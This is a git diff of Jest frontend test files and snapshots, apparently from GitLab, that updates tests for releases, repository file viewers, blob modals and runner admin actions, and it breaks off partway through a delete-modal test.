b/spec/frontend/releases/__snapshots__/util_spec.js.snap index b2580d47549..fd2a8eec4d4 100644 --- a/spec/frontend/releases/__snapshots__/util_spec.js.snap +++ b/spec/frontend/releases/__snapshots__/util_spec.js.snap @@ -44,6 +44,7 @@ Object { "author": Object { "__typename": "UserCore", "avatarUrl": "https://www.gravatar.com/avatar/16f8e2050ce10180ca571c2eb19cfce2?s=80&d=identicon", + "id": Any<String>, "username": "administrator", "webUrl": "http://localhost/administrator", }, @@ -139,6 +140,7 @@ Object { "author": Object { "__typename": "UserCore", "avatarUrl": "https://www.gravatar.com/avatar/16f8e2050ce10180ca571c2eb19cfce2?s=80&d=identicon", + "id": Any<String>, "username": "administrator", "webUrl": "http://localhost/administrator", }, @@ -153,6 +155,7 @@ Object { "__typename": "ReleaseEvidence", "collectedAt": "2018-12-03T00:00:00Z", "filepath": "http://localhost/releases-namespace/releases-project/-/releases/v1.1/evidences/1.json", + "id": "gid://gitlab/Releases::Evidence/1", "sha": "760d6cdfb0879c3ffedec13af470e0f71cf52c6cde4d", }, ], @@ -247,6 +250,7 @@ Object { "evidences": Array [], "milestones": Array [ Object { + "id": "gid://gitlab/Milestone/123", "issueStats": Object {}, "stats": undefined, "title": "12.3", @@ -254,6 +258,7 @@ Object { "webUrl": undefined, }, Object { + "id": "gid://gitlab/Milestone/124", "issueStats": Object {}, "stats": undefined, "title": "12.4", @@ -347,6 +352,7 @@ Object { "author": Object { "__typename": "UserCore", "avatarUrl": "https://www.gravatar.com/avatar/16f8e2050ce10180ca571c2eb19cfce2?s=80&d=identicon", + "id": Any<String>, "username": "administrator", "webUrl": "http://localhost/administrator", }, @@ -361,6 +367,7 @@ Object { "__typename": "ReleaseEvidence", "collectedAt": "2018-12-03T00:00:00Z", "filepath": "http://localhost/releases-namespace/releases-project/-/releases/v1.1/evidences/1.json", + "id": "gid://gitlab/Releases::Evidence/1", "sha": "760d6cdfb0879c3ffedec13af470e0f71cf52c6cde4d", }, ], diff --git a/spec/frontend/releases/components/app_show_spec.js b/spec/frontend/releases/components/app_show_spec.js index 72ebaaaf76c..a60b9bda66a 100644 --- a/spec/frontend/releases/components/app_show_spec.js +++ b/spec/frontend/releases/components/app_show_spec.js @@ -58,7 +58,6 @@ describe('Release show component', () => { const expectFlashWithMessage = (message) => { it(`shows a flash message that reads "${message}"`, () => { - expect(createFlash).toHaveBeenCalledTimes(1); expect(createFlash).toHaveBeenCalledWith({ message, captureError: true, diff --git a/spec/frontend/releases/util_spec.js b/spec/frontend/releases/util_spec.js index 3c1060cb0e8..055c8e8b39f 100644 --- a/spec/frontend/releases/util_spec.js +++ b/spec/frontend/releases/util_spec.js @@ -104,13 +104,32 @@ describe('releases/util.js', () => { describe('convertAllReleasesGraphQLResponse', () => { it('matches snapshot', () => { - expect(convertAllReleasesGraphQLResponse(originalAllReleasesQueryResponse)).toMatchSnapshot(); + expect(convertAllReleasesGraphQLResponse(originalAllReleasesQueryResponse)).toMatchSnapshot({ + data: [ + { + author: { + id: expect.any(String), + }, + }, + { + author: { + id: expect.any(String), + }, + }, + ], + }); }); }); describe('convertOneReleaseGraphQLResponse', () => { it('matches snapshot', () => { - expect(convertOneReleaseGraphQLResponse(originalOneReleaseQueryResponse)).toMatchSnapshot(); + expect(convertOneReleaseGraphQLResponse(originalOneReleaseQueryResponse)).toMatchSnapshot({ + data: { + author: { + id: expect.any(String), + }, + }, + }); }); }); diff --git a/spec/frontend/repository/commits_service_spec.js b/spec/frontend/repository/commits_service_spec.js index d924974aede..697fa7c4fd1 100644 --- a/spec/frontend/repository/commits_service_spec.js +++ b/spec/frontend/repository/commits_service_spec.js @@ -52,13 +52,6 @@ describe('commits service', () => { expect(axios.get.mock.calls.length).toEqual(1); }); - it('calls axios get twice if an offset is larger than 25', async () => { - await requestCommits(100); - - expect(axios.get.mock.calls[0][1]).toEqual({ params: { format: 'json', offset: 75 } }); - expect(axios.get.mock.calls[1][1]).toEqual({ params: { format: 'json', offset: 100 } }); - }); - it('updates the list of requested offsets', async () => { await requestCommits(200); diff --git a/spec/frontend/repository/components/__snapshots__/last_commit_spec.js.snap b/spec/frontend/repository/components/__snapshots__/last_commit_spec.js.snap index be4f8a688e0..7854325e4ed 100644 --- a/spec/frontend/repository/components/__snapshots__/last_commit_spec.js.snap +++ b/spec/frontend/repository/components/__snapshots__/last_commit_spec.js.snap @@ -2,7 +2,7 @@ exports[`Repository last commit component renders commit widget 1`] = ` <div - class="info-well d-none d-sm-flex project-last-commit commit p-3" + class="well-segment commit gl-p-5 gl-w-full" > <user-avatar-link-stub class="avatar-cell" @@ -99,6 +99,7 @@ exports[`Repository last commit component renders commit widget 1`] = ` text="123456789" title="Copy commit SHA" tooltipplacement="top" + variant="default" /> </gl-button-group-stub> </div> @@ -108,7 +109,7 @@ exports[`Repository last commit component renders commit widget 1`] = ` exports[`Repository last commit component renders the signature HTML as returned by the backend 1`] = ` <div - class="info-well d-none d-sm-flex project-last-commit commit p-3" + class="well-segment commit gl-p-5 gl-w-full" > <user-avatar-link-stub class="avatar-cell" @@ -209,6 +210,7 @@ exports[`Repository last commit component renders the signature HTML as returned text="123456789" title="Copy commit SHA" tooltipplacement="top" + variant="default" /> </gl-button-group-stub> </div> diff --git a/spec/frontend/repository/components/blob_button_group_spec.js b/spec/frontend/repository/components/blob_button_group_spec.js index f2a3354f204..9f9d574a8ed 100644 --- a/spec/frontend/repository/components/blob_button_group_spec.js +++ b/spec/frontend/repository/components/blob_button_group_spec.js @@ -9,6 +9,7 @@ const DEFAULT_PROPS = { name: 'some name', path: 'some/path', canPushCode: true, + canPushToBranch: true, replacePath: 'some/replace/path', deletePath: 'some/delete/path', emptyRepo: false, diff --git a/spec/frontend/repository/components/blob_content_viewer_spec.js b/spec/frontend/repository/components/blob_content_viewer_spec.js index d40e97bf5a3..9e00a2d0408 100644 --- a/spec/frontend/repository/components/blob_content_viewer_spec.js +++ b/spec/frontend/repository/components/blob_content_viewer_spec.js @@ -15,7 +15,7 @@ import ForkSuggestion from '~/repository/components/fork_suggestion.vue'; import { loadViewer, viewerProps } from '~/repository/components/blob_viewers'; import DownloadViewer from '~/repository/components/blob_viewers/download_viewer.vue'; import EmptyViewer from '~/repository/components/blob_viewers/empty_viewer.vue'; -import TextViewer from '~/repository/components/blob_viewers/text_viewer.vue'; +import SourceViewer from '~/vue_shared/components/source_viewer.vue'; import blobInfoQuery from '~/repository/queries/blob_info.query.graphql'; import { redirectTo } from '~/lib/utils/url_utility'; import { isLoggedIn } from '~/lib/utils/common_utils'; @@ -98,7 +98,7 @@ describe('Blob content viewer component', () => { const findForkSuggestion = () => wrapper.findComponent(ForkSuggestion); beforeEach(() => { - gon.features = { refactorTextViewer: true }; + gon.features = { highlightJs: true }; isLoggedIn.mockReturnValue(true); }); @@ -215,7 +215,7 @@ describe('Blob content viewer component', () => { viewer | loadViewerReturnValue | viewerPropsReturnValue ${'empty'} | ${EmptyViewer} | ${{}} ${'download'} | ${DownloadViewer} | ${{ filePath: '/some/file/path', fileName: 'test.js', fileSize: 100 }} - ${'text'} | ${TextViewer} | ${{ content: 'test', fileName: 'test.js', readOnly: true }} + ${'text'} | ${SourceViewer} | ${{ content: 'test', autoDetect: true }} `( 'renders viewer component for $viewer files', async ({ viewer, loadViewerReturnValue, viewerPropsReturnValue }) => { @@ -318,8 +318,14 @@ describe('Blob content viewer component', () => { repository: { empty }, } = projectMock; + afterEach(() => { + delete gon.current_user_id; + delete gon.current_username; + }); + it('renders component', async () => { window.gon.current_user_id = 1; + window.gon.current_username = 'root'; await createComponent({ pushCode, downloadCode, empty }, mount); @@ -330,28 +336,34 @@ describe('Blob content viewer component', () => { deletePath: webPath, canPushCode: pushCode, canLock: true, - isLocked: false, + isLocked: true, emptyRepo: empty, }); }); it.each` - canPushCode | canDownloadCode | canLock - ${true} | ${true} | ${true} - ${false} | ${true} | ${false} - ${true} | ${false} | ${false} - `('passes the correct lock states', async ({ canPushCode, canDownloadCode, canLock }) => { - await createComponent( - { - pushCode: canPushCode, - downloadCode: canDownloadCode, - empty, - }, - mount, - ); + canPushCode | canDownloadCode | username | canLock + ${true} | ${true} | ${'root'} | ${true} + ${false} | ${true} | ${'root'} | ${false} + ${true} | ${false} | ${'root'} | ${false} + ${true} | ${true} | ${'peter'} | ${false} + `( + 'passes the correct lock states', + async ({ canPushCode, canDownloadCode, username, canLock }) => { + gon.current_username = username; + + await createComponent( + { + pushCode: canPushCode, + downloadCode: canDownloadCode, + empty, + }, + mount, + ); - expect(findBlobButtonGroup().props('canLock')).toBe(canLock); - }); + expect(findBlobButtonGroup().props('canLock')).toBe(canLock); + }, + ); it('does not render if not logged in', async () => { isLoggedIn.mockReturnValueOnce(false); diff --git a/spec/frontend/repository/components/blob_viewers/pdf_viewer_spec.js b/spec/frontend/repository/components/blob_viewers/pdf_viewer_spec.js new file mode 100644 index 00000000000..fd910002529 --- /dev/null +++ b/spec/frontend/repository/components/blob_viewers/pdf_viewer_spec.js @@ -0,0 +1,59 @@ +import { GlButton } from '@gitlab/ui'; +import Component from '~/repository/components/blob_viewers/pdf_viewer.vue'; +import PdfViewer from '~/blob/pdf/pdf_viewer.vue'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; + +describe('PDF Viewer', () => { + let wrapper; + + const defaultPropsData = { url: 'some/pdf_blob.pdf' }; + + const createComponent = (fileSize = 999) => { + wrapper = shallowMountExtended(Component, { propsData: { ...defaultPropsData, fileSize } }); + }; + + const findPDFViewer = () => wrapper.findComponent(PdfViewer); + const findHelpText = () => wrapper.find('p'); + const findDownLoadButton = () => wrapper.findComponent(GlButton); + + it('renders a PDF Viewer component', () => { + createComponent(); + + expect(findPDFViewer().exists()).toBe(true); + expect(findPDFViewer().props('pdf')).toBe(defaultPropsData.url); + }); + + describe('Too large', () => { + beforeEach(() => createComponent(20000000)); + + it('does not a PDF Viewer component', () => { + expect(findPDFViewer().exists()).toBe(false); + }); + + it('renders help text', () => { + expect(findHelpText().text()).toBe( + 'This PDF is too large to display. Please download to view.', + ); + }); + + it('renders a download button', () => { + expect(findDownLoadButton().text()).toBe('Download PDF'); + expect(findDownLoadButton().props('icon')).toBe('download'); + }); + }); + + describe('Too many pages', () => { + beforeEach(() => { + createComponent(); + findPDFViewer().vm.$emit('pdflabload', 100); + }); + + it('does not a PDF Viewer component', () => { + expect(findPDFViewer().exists()).toBe(false); + }); + + it('renders a download button', () => { + expect(findDownLoadButton().exists()).toBe(true); + }); + }); +}); diff --git a/spec/frontend/repository/components/blob_viewers/text_viewer_spec.js b/spec/frontend/repository/components/blob_viewers/text_viewer_spec.js deleted file mode 100644 index 88c5bee6564..00000000000 --- a/spec/frontend/repository/components/blob_viewers/text_viewer_spec.js +++ /dev/null @@ -1,30 +0,0 @@ -import { shallowMount } from '@vue/test-utils'; -import waitForPromises from 'helpers/wait_for_promises'; -import TextViewer from '~/repository/components/blob_viewers/text_viewer.vue'; -import SourceEditor from '~/vue_shared/components/source_editor.vue'; - -describe('Text Viewer', () => { - let wrapper; - const propsData = { - content: 'Some content', - fileName: 'file_name.js', - readOnly: true, - }; - - const createComponent = () => { - wrapper = shallowMount(TextViewer, { propsData }); - }; - - const findEditor = () => wrapper.findComponent(SourceEditor); - - it('renders a Source Editor component', async () => { - createComponent(); - - await waitForPromises(); - - expect(findEditor().exists()).toBe(true); - expect(findEditor().props('value')).toBe(propsData.content); - expect(findEditor().props('fileName')).toBe(propsData.fileName); - expect(findEditor().props('editorOptions')).toEqual({ readOnly: propsData.readOnly }); - }); -}); diff --git a/spec/frontend/repository/components/delete_blob_modal_spec.js b/spec/frontend/repository/components/delete_blob_modal_spec.js index 2c62868f391..785783b2e75 100644 --- a/spec/frontend/repository/components/delete_blob_modal_spec.js +++ b/spec/frontend/repository/components/delete_blob_modal_spec.js @@ -13,6 +13,7 @@ const initialProps = { targetBranch: 'some-target-branch', originalBranch: 'main', canPushCode: true, + canPushToBranch: true, emptyRepo: false, }; @@ -103,22 +104,25 @@ describe('DeleteBlobModal', () => { ); it.each` - input | value | emptyRepo | canPushCode | exist - ${'authenticity_token'} | ${'mock-csrf-token'} | ${false} | ${true} | ${true} - ${'authenticity_token'} | ${'mock-csrf-token'} | ${true} | ${false} | ${true} - ${'_method'} | ${'delete'} | ${false} | ${true} | ${true} - ${'_method'} | ${'delete'} | ${true} | ${false} | ${true} - ${'original_branch'} | ${initialProps.originalBranch} | ${false} | ${true} | ${true} - ${'original_branch'} | ${undefined} | ${true} | ${true} | ${false} - ${'create_merge_request'} | ${'1'} | ${false} | ${false} | ${true} - ${'create_merge_request'} | ${'1'} | ${false} | ${true} | ${true} - ${'create_merge_request'} | ${undefined} | ${true} | ${false} | ${false} + input | value | emptyRepo | canPushCode | canPushToBranch | exist + ${'authenticity_token'} | ${'mock-csrf-token'} | ${false} | ${true} | ${true} | ${true} + ${'authenticity_token'} | ${'mock-csrf-token'} | ${true} | ${false} | ${true} | ${true} + ${'_method'} | ${'delete'} | ${false} | ${true} | ${true} | ${true} + ${'_method'} | ${'delete'} | ${true} | ${false} | ${true} | ${true} + ${'original_branch'} | ${initialProps.originalBranch} | ${false} | ${true} | ${true} | ${true} + ${'original_branch'} | ${undefined} | ${true} | ${true} | ${true} | ${false} + ${'create_merge_request'} | ${'1'} | ${false} | ${false} | ${true} | ${true} + ${'create_merge_request'} | ${'1'} | ${false} | ${true} | ${true} | ${true} + ${'create_merge_request'} | ${'1'} | ${false} | ${false} | ${false} | ${true} + ${'create_merge_request'} | ${'1'} | ${false} | ${false} | ${true} | ${true} + ${'create_merge_request'} | ${undefined} | ${true} | ${false} | ${true} | ${false} `( 'passes $input as a hidden input with the correct value', - ({ input, value, emptyRepo, canPushCode, exist }) => { + ({ input, value, emptyRepo, canPushCode, canPushToBranch, exist }) => { createComponent({ emptyRepo, canPushCode, + canPushToBranch, }); const inputMethod = findForm().find(`input[name="${input}"]`); diff --git a/spec/frontend/repository/components/table/row_spec.js b/spec/frontend/repository/components/table/row_spec.js index 76e9f7da011..7f59dbfe0d1 100644 --- a/spec/frontend/repository/components/table/row_spec.js +++ b/spec/frontend/repository/components/table/row_spec.js @@ -4,6 +4,7 @@ import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; import TableRow from '~/repository/components/table/row.vue'; import FileIcon from '~/vue_shared/components/file_icon.vue'; import { FILE_SYMLINK_MODE } from '~/vue_shared/constants'; +import { ROW_APPEAR_DELAY } from '~/repository/constants'; const COMMIT_MOCK = { lockLabel: 'Locked by Root', committedDate: '2019-01-01' }; @@ -17,12 +18,12 @@ function factory(propsData = {}) { vm = shallowMount(TableRow, { propsData: { + commitInfo: COMMIT_MOCK, ...propsData, name: propsData.path, projectPath: 'gitlab-org/gitlab-ce', url: `https://test.com`, totalEntries: 10, - commitInfo: COMMIT_MOCK, rowNumber: 123, }, directives: { @@ -251,6 +252,8 @@ describe('Repository table row component', () => { }); describe('row visibility', () => { + beforeAll(() => jest.useFakeTimers()); + beforeEach(() => { factory({ id: '1', @@ -258,18 +261,20 @@ describe('Repository table row component', () => { path: 'test', type: 'tree', currentPath: '/', + commitInfo: null, }); }); - it('emits a `row-appear` event', () => { + + afterAll(() => jest.useRealTimers()); + + it('emits a `row-appear` event', async () => { findIntersectionObserver().vm.$emit('appear'); - expect(vm.emitted('row-appear')).toEqual([ - [ - { - hasCommit: true, - rowNumber: 123, - }, - ], - ]); + + jest.runAllTimers(); + + expect(setTimeout).toHaveBeenCalledTimes(1); + expect(setTimeout).toHaveBeenLastCalledWith(expect.any(Function), ROW_APPEAR_DELAY); + expect(vm.emitted('row-appear')).toEqual([[123]]); }); }); }); diff --git a/spec/frontend/repository/components/tree_content_spec.js b/spec/frontend/repository/components/tree_content_spec.js index 49397c77215..9c5d07eede3 100644 --- a/spec/frontend/repository/components/tree_content_spec.js +++ b/spec/frontend/repository/components/tree_content_spec.js @@ -2,7 +2,7 @@ import { shallowMount } from '@vue/test-utils'; import paginatedTreeQuery from 'shared_queries/repository/paginated_tree.query.graphql'; import FilePreview from '~/repository/components/preview/index.vue'; import FileTable from '~/repository/components/table/index.vue'; -import TreeContent from '~/repository/components/tree_content.vue'; +import TreeContent from 'jh_else_ce/repository/components/tree_content.vue'; import { loadCommits, isRequested, resetRequestedCommits } from '~/repository/commits_service'; jest.mock('~/repository/commits_service', () => ({ @@ -190,14 +190,28 @@ describe('Repository table component', () => { }); }); - it('loads commit data when row-appear event is emitted', () => { + describe('commit data', () => { const path = 'some/path'; - const rowNumber = 1; - factory(path); - findFileTable().vm.$emit('row-appear', { hasCommit: false, rowNumber }); + it('loads commit data for both top and bottom batches when row-appear event is emitted', () => { + const rowNumber = 50; - expect(isRequested).toHaveBeenCalledWith(rowNumber); - expect(loadCommits).toHaveBeenCalledWith('', path, '', rowNumber); + factory(path); + findFileTable().vm.$emit('row-appear', rowNumber); + + expect(isRequested).toHaveBeenCalledWith(rowNumber); + + expect(loadCommits.mock.calls).toEqual([ + ['', path, '', rowNumber], + ['', path, '', rowNumber - 25], + ]); + }); + + it('loads commit data once if rowNumber is zero', () => { + factory(path); + findFileTable().vm.$emit('row-appear', 0); + + expect(loadCommits.mock.calls).toEqual([['', path, '', 0]]); + }); }); }); diff --git a/spec/frontend/repository/components/upload_blob_modal_spec.js b/spec/frontend/repository/components/upload_blob_modal_spec.js index 36847107558..e9dfa3cd495 100644 --- a/spec/frontend/repository/components/upload_blob_modal_spec.js +++ b/spec/frontend/repository/components/upload_blob_modal_spec.js @@ -212,8 +212,8 @@ describe('UploadBlobModal', () => { createComponent(); }); - it('displays the default "Upload New File" modal title ', () => { - expect(findModal().props('title')).toBe('Upload New File'); + it('displays the default "Upload new file" modal title ', () => { + expect(findModal().props('title')).toBe('Upload new file'); }); it('display the defaul primary button text', () => { diff --git a/spec/frontend/repository/mock_data.js b/spec/frontend/repository/mock_data.js index adf5991ac3c..74d35daf578 100644 --- a/spec/frontend/repository/mock_data.js +++ b/spec/frontend/repository/mock_data.js @@ -1,4 +1,5 @@ export const simpleViewerMock = { + id: '1', name: 'some_file.js', size: 123, rawSize: 123, @@ -11,6 +12,7 @@ export const simpleViewerMock = { forkAndEditPath: 'some_file.js/fork/edit', ideForkAndEditPath: 'some_file.js/fork/ide', canModifyBlob: true, + canCurrentUserPushToBranch: true, storedExternally: false, rawPath: 'some_file.js', replacePath: 'some_file.js/replace', @@ -45,7 +47,13 @@ export const projectMock = { id: '1234', userPermissions: userPermissionsMock, pathLocks: { - nodes: [], + nodes: [ + { + id: 'test', + path: simpleViewerMock.path, + user: { id: '123', username: 'root' }, + }, + ], }, repository: { empty: false, diff --git a/spec/frontend/runner/admin_runners/admin_runners_app_spec.js b/spec/frontend/runner/admin_runners/admin_runners_app_spec.js index 7eda9aa2850..7015fe809b0 100644 --- a/spec/frontend/runner/admin_runners/admin_runners_app_spec.js +++ b/spec/frontend/runner/admin_runners/admin_runners_app_spec.js @@ -147,7 +147,7 @@ describe('AdminRunnersApp', () => { }), expect.objectContaining({ type: PARAM_KEY_TAG, - recentTokenValuesStorageKey: `${ADMIN_FILTERED_SEARCH_NAMESPACE}-recent-tags`, + recentSuggestionsStorageKey: `${ADMIN_FILTERED_SEARCH_NAMESPACE}-recent-tags`, }), ]); }); @@ -155,9 +155,7 @@ describe('AdminRunnersApp', () => { it('shows the active runner count', () => { createComponent({ mountFn: mount }); - expect(findRunnerFilteredSearchBar().text()).toMatch( - `Runners currently online: ${mockActiveRunnersCount}`, - ); + expect(wrapper.text()).toMatch(new RegExp(`Online Runners ${mockActiveRunnersCount}`)); }); describe('when a filter is preselected', () => { diff --git a/spec/frontend/runner/components/cells/runner_actions_cell_spec.js b/spec/frontend/runner/components/cells/runner_actions_cell_spec.js index 2874bdbe280..95c212cb0a9 100644 --- a/spec/frontend/runner/components/cells/runner_actions_cell_spec.js +++ b/spec/frontend/runner/components/cells/runner_actions_cell_spec.js @@ -3,13 +3,17 @@ import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; import waitForPromises from 'helpers/wait_for_promises'; +import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; import createFlash from '~/flash'; +import { getIdFromGraphQLId } from '~/graphql_shared/utils'; + +import { captureException } from '~/runner/sentry_utils'; import RunnerActionCell from '~/runner/components/cells/runner_actions_cell.vue'; +import RunnerDeleteModal from '~/runner/components/runner_delete_modal.vue'; import getGroupRunnersQuery from '~/runner/graphql/get_group_runners.query.graphql'; import getRunnersQuery from '~/runner/graphql/get_runners.query.graphql'; import runnerDeleteMutation from '~/runner/graphql/runner_delete.mutation.graphql'; import runnerActionsUpdateMutation from '~/runner/graphql/runner_actions_update.mutation.graphql'; -import { captureException } from '~/runner/sentry_utils'; import { runnersData } from '../../mock_data'; const mockRunner = runnersData.data.runners.nodes[0]; @@ -25,12 +29,16 @@ jest.mock('~/runner/sentry_utils'); describe('RunnerTypeCell', () => { let wrapper; + + const mockToastShow = jest.fn(); const runnerDeleteMutationHandler = jest.fn(); const runnerActionsUpdateMutationHandler = jest.fn(); const findEditBtn = () => wrapper.findByTestId('edit-runner'); const findToggleActiveBtn = () => wrapper.findByTestId('toggle-active-runner'); + const findRunnerDeleteModal = () => wrapper.findComponent(RunnerDeleteModal); const findDeleteBtn = () => wrapper.findByTestId('delete-runner'); + const getTooltip = (w) => getBinding(w.element, 'gl-tooltip')?.value; const createComponent = ({ active = true } = {}, options) => { wrapper = extendedWrapper( @@ -38,6 +46,7 @@ describe('RunnerTypeCell', () => { propsData: { runner: { id: mockRunner.id, + shortSha: mockRunner.shortSha, adminUrl: mockRunner.adminUrl, active, }, @@ -47,6 +56,15 @@ describe('RunnerTypeCell', () => { [runnerDeleteMutation, runnerDeleteMutationHandler], [runnerActionsUpdateMutation, runnerActionsUpdateMutationHandler], ]), + directives: { + GlTooltip: createMockDirective(), + GlModal: createMockDirective(), + }, + mocks: { + $toast: { + show: mockToastShow, + }, + }, ...options, }), ); @@ -72,197 +90,85 @@ describe('RunnerTypeCell', () => { }); afterEach(() => { + mockToastShow.mockReset(); runnerDeleteMutationHandler.mockReset(); runnerActionsUpdateMutationHandler.mockReset(); wrapper.destroy(); }); - it('Displays the runner edit link with the correct href', () => { - createComponent(); - - expect(findEditBtn().attributes('href')).toBe(mockRunner.adminUrl); - }); - - describe.each` - state | label | icon | isActive | newActiveValue - ${'active'} | ${'Pause'} | ${'pause'} | ${true} | ${false} - ${'paused'} | ${'Resume'} | ${'play'} | ${false} | ${true} - `('When the runner is $state', ({ label, icon, isActive, newActiveValue }) => { - beforeEach(() => { - createComponent({ active: isActive }); - }); - - it(`Displays a ${icon} button`, () => { - expect(findToggleActiveBtn().props('loading')).toBe(false); - expect(findToggleActiveBtn().props('icon')).toBe(icon); - expect(findToggleActiveBtn().attributes('title')).toBe(label); - expect(findToggleActiveBtn().attributes('aria-label')).toBe(label); - }); - - it(`After clicking the ${icon} button, the button has a loading state`, async () => { - await findToggleActiveBtn().vm.$emit('click'); - - expect(findToggleActiveBtn().props('loading')).toBe(true); - }); - - it(`After the ${icon} button is clicked, stale tooltip is removed`, async () => { - await findToggleActiveBtn().vm.$emit('click'); + describe('Edit Action', () => { + it('Displays the runner edit link with the correct href', () => { + createComponent(); - expect(findToggleActiveBtn().attributes('title')).toBe(''); - expect(findToggleActiveBtn().attributes('aria-label')).toBe(''); + expect(findEditBtn().attributes('href')).toBe(mockRunner.adminUrl); }); + }); - describe(`When clicking on the ${icon} button`, () => { - it(`The apollo mutation to set active to ${newActiveValue} is called`, async () => { - expect(runnerActionsUpdateMutationHandler).toHaveBeenCalledTimes(0); - - await findToggleActiveBtn().vm.$emit('click'); + describe('Toggle active action', () => { + describe.each` + state | label | icon | isActive | newActiveValue + ${'active'} | ${'Pause'} | ${'pause'} | ${true} | ${false} + ${'paused'} | ${'Resume'} | ${'play'} | ${false} | ${true} + `('When the runner is $state', ({ label, icon, isActive, newActiveValue }) => { + beforeEach(() => { + createComponent({ active: isActive }); + }); - expect(runnerActionsUpdateMutationHandler).toHaveBeenCalledTimes(1); - expect(runnerActionsUpdateMutationHandler).toHaveBeenCalledWith({ - input: { - id: mockRunner.id, - active: newActiveValue, - }, - }); + it(`Displays a ${icon} button`, () => { + expect(findToggleActiveBtn().props('loading')).toBe(false); + expect(findToggleActiveBtn().props('icon')).toBe(icon); + expect(getTooltip(findToggleActiveBtn())).toBe(label); + expect(findToggleActiveBtn().attributes('aria-label')).toBe(label); }); - it('The button does not have a loading state after the mutation occurs', async () => { + it(`After clicking the ${icon} button, the button has a loading state`, async () => { await findToggleActiveBtn().vm.$emit('click'); expect(findToggleActiveBtn().props('loading')).toBe(true); - - await waitForPromises(); - - expect(findToggleActiveBtn().props('loading')).toBe(false); }); - }); - describe('When update fails', () => { - describe('On a network error', () => { - const mockErrorMsg = 'Update error!'; - - beforeEach(async () => { - runnerActionsUpdateMutationHandler.mockRejectedValueOnce(new Error(mockErrorMsg)); - - await findToggleActiveBtn().vm.$emit('click'); - }); - - it('error is reported to sentry', () => { - expect(captureException).toHaveBeenCalledWith({ - error: new Error(`Network error: ${mockErrorMsg}`), - component: 'RunnerActionsCell', - }); - }); + it(`After the ${icon} button is clicked, stale tooltip is removed`, async () => { + await findToggleActiveBtn().vm.$emit('click'); - it('error is shown to the user', () => { - expect(createFlash).toHaveBeenCalledTimes(1); - }); + expect(getTooltip(findToggleActiveBtn())).toBe(''); + expect(findToggleActiveBtn().attributes('aria-label')).toBe(''); }); - describe('On a validation error', () => { - const mockErrorMsg = 'Runner not found!'; - const mockErrorMsg2 = 'User not allowed!'; - - beforeEach(async () => { - runnerActionsUpdateMutationHandler.mockResolvedValue({ - data: { - runnerUpdate: { - runner: mockRunner, - errors: [mockErrorMsg, mockErrorMsg2], - }, - }, - }); + describe(`When clicking on the ${icon} button`, () => { + it(`The apollo mutation to set active to ${newActiveValue} is called`, async () => { + expect(runnerActionsUpdateMutationHandler).toHaveBeenCalledTimes(0); await findToggleActiveBtn().vm.$emit('click'); - }); - - it('error is reported to sentry', () => { - expect(captureException).toHaveBeenCalledWith({ - error: new Error(`${mockErrorMsg} ${mockErrorMsg2}`), - component: 'RunnerActionsCell', - }); - }); - it('error is shown to the user', () => { - expect(createFlash).toHaveBeenCalledTimes(1); - }); - }); - }); - }); - - describe('When the user clicks a runner', () => { - beforeEach(() => { - jest.spyOn(window, 'confirm'); - - createComponent(); - }); - - afterEach(() => { - window.confirm.mockRestore(); - }); - - describe('When the user confirms deletion', () => { - beforeEach(async () => { - window.confirm.mockReturnValue(true); - await findDeleteBtn().vm.$emit('click'); - }); - - it('The user sees a confirmation alert', () => { - expect(window.confirm).toHaveBeenCalledTimes(1); - expect(window.confirm).toHaveBeenCalledWith(expect.any(String)); - }); - - it('The delete mutation is called correctly', () => { - expect(runnerDeleteMutationHandler).toHaveBeenCalledTimes(1); - expect(runnerDeleteMutationHandler).toHaveBeenCalledWith({ - input: { id: mockRunner.id }, - }); - }); - - it('When delete mutation is called, current runners are refetched', async () => { - jest.spyOn(wrapper.vm.$apollo, 'mutate'); - - await findDeleteBtn().vm.$emit('click'); - - expect(wrapper.vm.$apollo.mutate).toHaveBeenCalledWith({ - mutation: runnerDeleteMutation, - variables: { + expect(runnerActionsUpdateMutationHandler).toHaveBeenCalledTimes(1); + expect(runnerActionsUpdateMutationHandler).toHaveBeenCalledWith({ input: { id: mockRunner.id, + active: newActiveValue, }, - }, - awaitRefetchQueries: true, - refetchQueries: [getRunnersQueryName, getGroupRunnersQueryName], + }); }); - }); - - it('The delete button does not have a loading state', () => { - expect(findDeleteBtn().props('loading')).toBe(false); - expect(findDeleteBtn().attributes('title')).toBe('Remove'); - }); - it('After the delete button is clicked, loading state is shown', async () => { - await findDeleteBtn().vm.$emit('click'); + it('The button does not have a loading state after the mutation occurs', async () => { + await findToggleActiveBtn().vm.$emit('click'); - expect(findDeleteBtn().props('loading')).toBe(true); - }); + expect(findToggleActiveBtn().props('loading')).toBe(true); - it('After the delete button is clicked, stale tooltip is removed', async () => { - await findDeleteBtn().vm.$emit('click'); + await waitForPromises(); - expect(findDeleteBtn().attributes('title')).toBe(''); + expect(findToggleActiveBtn().props('loading')).toBe(false); + }); }); - describe('When delete fails', () => { + describe('When update fails', () => { describe('On a network error', () => { - const mockErrorMsg = 'Delete error!'; + const mockErrorMsg = 'Update error!'; beforeEach(async () => { - runnerDeleteMutationHandler.mockRejectedValueOnce(new Error(mockErrorMsg)); + runnerActionsUpdateMutationHandler.mockRejectedValueOnce(new Error(mockErrorMsg)); - await findDeleteBtn().vm.$emit('click'); + await findToggleActiveBtn().vm.$emit('click'); }); it('error is reported to sentry', () => { @@ -282,15 +188,16 @@ describe('RunnerTypeCell', () => { const mockErrorMsg2 = 'User not allowed!'; beforeEach(async () => { - runnerDeleteMutationHandler.mockResolvedValue({ + runnerActionsUpdateMutationHandler.mockResolvedValue({ data: { - runnerDelete: { + runnerUpdate: { + runner: mockRunner, errors: [mockErrorMsg, mockErrorMsg2], }, }, }); - await findDeleteBtn().vm.$emit('click'); + await findToggleActiveBtn().vm.$emit('click'); }); it('error is reported to sentry', () => { @@ -306,24 +213,129 @@ describe('RunnerTypeCell', () => { }); }); }); + }); - describe('When the user does not confirm deletion', () => { - beforeEach(async () => { - window.confirm.mockReturnValue(false); - await findDeleteBtn().vm.$emit('click'); + describe('Delete action', () => { + beforeEach(() => { + createComponent( + {}, + { + stubs: { RunnerDeleteModal }, + }, + ); + }); + + it('Delete button opens delete modal', () => { + const modalId = getBinding(findDeleteBtn().element, 'gl-modal').value; + + expect(findRunnerDeleteModal().attributes('modal-id')).toBeDefined(); + 